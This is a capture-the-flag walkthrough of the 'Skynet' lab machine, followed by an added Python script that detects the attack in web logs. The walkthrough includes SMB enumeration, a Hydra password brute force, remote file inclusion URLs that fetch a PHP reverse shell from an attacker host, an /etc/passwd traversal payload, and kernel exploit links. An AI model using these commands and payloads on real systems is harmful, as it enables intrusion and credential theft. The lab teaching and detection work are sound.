# Skynet

###### tags: `vulnerableMachine` `linuxMachine`

[TOC]

## Recon

![](https://i.imgur.com/fxQZLUq.png)

![](https://i.imgur.com/i77hgs6.png)

### SMB service

Port 445 (Server Message Block) shares files over the network.

Script

```
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.82.161
```

Result

```
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-users:
|   SKYNET\milesdyson (RID: 1000)
|     Full name:
|     Description:
|_    Flags:       Normal user account
| smb-enum-shares:
|   account_used: guest
|   \\10.10.82.161\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (skynet server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.82.161\anonymous:
|     Type: STYPE_DISKTREE
|     Comment: Skynet Anonymous Share
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\srv\samba
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.82.161\milesdyson:
|     Type: STYPE_DISKTREE
|     Comment: Miles Dyson Personal Share
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\milesdyson\share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.82.161\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 73.31 seconds
```

Connect to the SMB server

```
smbclient //10.10.82.161/anonymous
```

```
get attention.txt
get log1.txt
```

attention.txt

```
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
```

log1.txt (password log)

```
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
```

---

Enumerate web paths

```
dirb http://10.10.82.161
```

```
---- Scanning URL: http://10.10.82.161/ ----
==> DIRECTORY: http://10.10.82.161/admin/
==> DIRECTORY: http://10.10.82.161/config/
==> DIRECTORY: http://10.10.82.161/css/
+ http://10.10.82.161/index.html (CODE:200|SIZE:523)
==> DIRECTORY: http://10.10.82.161/js/
+ http://10.10.82.161/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://10.10.82.161/squirrelmail/
```

## Initial Access

![](https://i.imgur.com/doYIXNo.png)

```
POST /squirrelmail/src/redirect.php HTTP/1.1
Host: 10.10.82.161
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Origin: http://10.10.82.161
Connection: close
Referer: http://10.10.82.161/squirrelmail/src/login.php
Cookie: squirrelmail_language=en_US; SQMSESSID=lbg6fj12qf3rk7ikenntmsokq7
Upgrade-Insecure-Requests: 1

login_username=meow&secretkey=meow&js_autodetect_results=1&just_logged_in=1
```

Login failure page

![](https://i.imgur.com/LIHQyT0.png)

```
Unknown user or password incorrect.
```

Login (Hydra)

Generate potential usernames: https://github.com/soxoj/username-generation-guide

### Username Generate

```
python3 generate_by_real_info.py
First name: Miles
Last name: Dyson
Year of birth:
Username (optional):
Zip code (optional):
dyson
dysonmiles
milesdyson
mdyson
```

### Hydra

```
hydra -L username.txt -P password.txt 10.10.82.161 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect." -o result
```

#### Result

```
# Hydra v9.4 run at 2023-01-31 17:32:55 on 10.10.82.161 http-post-form (hydra -L username.txt -P password.txt -o result 10.10.82.161 http-post-form /squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.)
[80][http-post-form] host: 10.10.82.161   login: milesdyson   password: cyborg007haloterminator
```

![](https://i.imgur.com/AX56WBE.png)

---

Password reset mail

![](https://i.imgur.com/Mcai6PE.png)

```
Password:)s{A&2Z=F^n_E.B`
```

Download the files in /note

```
recurse NO
prompt OFF
mget *
```

important.txt

![](https://i.imgur.com/9bV3c0w.png)

---

![](https://i.imgur.com/IiqgSiM.png)

```
1. Add features to beta CMS /45kra24zxs28v3yd
```

A CMS (Content Management System) is used to manage, organize, store and publish the content of a website. It lets people who are not skilled at web development manage site content through a simple interface, without deep knowledge of web technology. Common CMSs include WordPress, Joomla and Drupal.

![](https://i.imgur.com/plkZDJq.png)

```
dirb http://10.10.82.161/45kra24zxs28v3yd/
```

Result

```
---- Scanning URL: http://10.10.82.161/45kra24zxs28v3yd/ ----
==> DIRECTORY: http://10.10.82.161/45kra24zxs28v3yd/administrator/
```

![](https://i.imgur.com/kgJsZVy.png)

### Search public exploit (cuppa)

https://www.exploit-db.com/exploits/25971

![](https://i.imgur.com/5I9jhn9.png)

Web vulnerabilities

- Remote file inclusion
- Local file inclusion

```
<?php include($_REQUEST["urlConfig"]); ?>
```

Exploit

```
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
```

We can make the server include our reverse shell.

pentestmonkey reverse shell (PHP): https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

```
python3 -m http.server
```

RCE (RFI)

```
http://10.10.82.161/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.17.11.72:8000/phpShell.php
```

![](https://i.imgur.com/fBVOtbq.png)

## Privilege Escalation

Check sudo

![](https://i.imgur.com/3oeYimn.png)

---

Check SUID

```
find / -type f -perm -04000 -ls 2>/dev/null
```

![](https://i.imgur.com/bwibLEO.png)

### Run linPEAS

![](https://i.imgur.com/rkknfh1.png)

Exploit the Linux kernel: the installed kernel version is vulnerable.

https://www.exploit-db.com/exploits/43418

![](https://i.imgur.com/BMRuVQe.png)

![](https://i.imgur.com/DjUWubJ.png)
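As an added defender's example (not part of the original writeup), the script below runs over constructed Apache access-log lines and flags the two web-side patterns of this chain: repeated POSTs to /squirrelmail/src/redirect.php like the Hydra run, and alertConfigField.php requests whose urlConfig value is a URL or a traversal path, the input that include($_REQUEST["urlConfig"]) would load verbatim. The log lines, the alert threshold and the function names are assumptions.

```python
"""Added detection example (not from the original writeup): flag the webmail
brute force and the cuppa urlConfig file-inclusion requests in Apache logs."""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed common-log-format lines; not captured from the real machine.
SAMPLE_LOG = """\
10.17.11.72 - - [31/Jan/2023:17:32:55 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 -
10.17.11.72 - - [31/Jan/2023:17:32:55 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 -
10.17.11.72 - - [31/Jan/2023:17:32:56 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 -
10.17.11.72 - - [31/Jan/2023:17:32:56 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 -
10.10.82.1 - - [31/Jan/2023:17:33:10 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 -
10.17.11.72 - - [31/Jan/2023:17:40:02 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.17.11.72:8000/phpShell.php HTTP/1.1" 200 12
10.17.11.72 - - [31/Jan/2023:17:41:10 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2000
10.10.82.1 - - [31/Jan/2023:17:45:00 +0000] "GET /index.html HTTP/1.1" 200 523
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
LOGIN_PATH = "/squirrelmail/src/redirect.php"  # form Hydra posted to above
BRUTE_THRESHOLD = 3  # assumed: login POSTs from one IP before alerting


def parse_log(text):
    """Return one dict per well-formed log line; malformed lines are skipped."""
    return [m.groupdict() for m in map(LOG_RE.match, text.splitlines()) if m]


def login_bruteforce_sources(entries, threshold=BRUTE_THRESHOLD):
    """IPs that POST to the webmail login at least `threshold` times."""
    counts = Counter(e["ip"] for e in entries
                     if e["method"] == "POST"
                     and urlsplit(e["target"]).path == LOGIN_PATH)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


def file_inclusion_attempts(entries):
    """(ip, target) pairs whose urlConfig value is a URL or a traversal path,
    i.e. input that include($_REQUEST["urlConfig"]) would load verbatim."""
    hits = []
    for e in entries:
        for raw in parse_qs(urlsplit(e["target"]).query).get("urlConfig", []):
            value = unquote(raw).lower()  # also catches %2e%2e%2f style encoding
            if "://" in value or "../" in value or "..\\" in value:
                hits.append((e["ip"], e["target"]))
    return hits
```

On the constructed sample, `login_bruteforce_sources(parse_log(SAMPLE_LOG))` returns `['10.17.11.72']` and `file_inclusion_attempts` returns the two alertConfigField.php requests from that IP, while the single legitimate login from 10.10.82.1 stays below the threshold.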